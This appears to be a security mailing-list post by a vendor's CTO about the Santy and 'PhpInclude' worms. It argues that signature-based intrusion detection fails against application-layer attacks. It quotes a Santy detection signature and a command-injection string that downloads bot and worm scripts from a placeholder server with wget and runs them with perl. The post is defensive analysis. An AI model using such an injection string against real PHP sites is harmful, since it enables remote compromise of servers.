The Santy worm and Application Security

["Ofer Shezaf" <Ofer.Shezaf () breach com>]

Hi All,

As an application security professional I've always been frustrated, as
I'm sure many of you have been, with the lack of understanding of
application security among IT professionals. Many think that solving
application security issues only requires an IPS/IDS, VA and patching.
Only a few out there really understand the depth of the problem as
presented in the OWASP top 10.

The Santy worm is a turning point in this respect. As Santy and
"PhpInclude", its successor, are application layer attacks ("PHP
injection" and "command injection" respectively) they stretch signature
based technology to its limits and require signatures that are easy to
evade and are prone to generate false positives.

Just think how many different ways the Santy attack vector used as a
snort signature <<<'&highlight=%2527%252Esystem('>>> can be modified to
evade an IDS (manually or automatically).

"PhpInclude" is even more interesting as it does not address a specific
vulnerability but tries to exploit a known flawed technique used to
write PHP code. It tries to change arbitrary parameters of a PHP script
to a command injection string, expecting that in some cases these
parameters will be used in a PHP include statement. It is probably the
first worm to exploit a OWASP top 10 security problem and not a specific
voluntarily.

The "phpInclude" attack vector is varying but has the general form
<<<cmd=cd /tmp;wget *server*/spybot.txt;wget *server*/worm1.txt; perl
worm1.txt>>>. A signature based system may look for the signatures such
as "perl", "cmd" or "wget" but they are way too short and simplistic to
evade false positives.

"Santy" and "phpInclude" emphasize the need for real application
security measurements such as code review, application layer scanning
and real time application layer security. 

An interesting solution for real time protection is application layer
signatures. Such signatures predict better application layer attacks. To
do so they have to be contextual (i.e. confined to field values),
normalized and correlated to other attack indicators such as abnormal
behavior or multiple signature match during the session's requests and
responses. 

While I'm not writing this all as a marketing pitch, some of these ideas
are implemented in my company's products ;-) I'd be happy to hear what
the other pros here have to say about this.

~ Ofer

Ofer Shezaf, CTO 
Breach Security, Inc. 
Deployable Application Security 
http://www.breach.com

Tel: +972.9.956.0036 ext.212
Cell: +972.54.443.1119
ofers () breach com